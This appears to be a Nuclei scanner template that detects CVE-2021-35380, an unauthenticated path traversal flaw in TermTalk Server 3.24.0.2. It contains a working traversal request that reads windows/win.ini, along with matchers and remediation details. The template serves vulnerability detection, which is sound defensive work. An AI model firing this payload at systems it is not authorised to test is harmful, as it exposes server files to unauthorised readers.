id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
    - https://www.swascan.com/it/security-blog/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    epss-score: 0.19555
    epss-percentile: 0.9578
    cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: solari
    product: termtalk_server
  tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 4a0a00473045022100e16d53b555125628da44e3a70f66004c38dc6b1f1ad7a3c013064e1a190d6bd5022073daee9b4a20b867aaea10e2659bec031b9431d3a06371929fdbfa520820a0f8:922c64590222798bb761d5b6d8e72950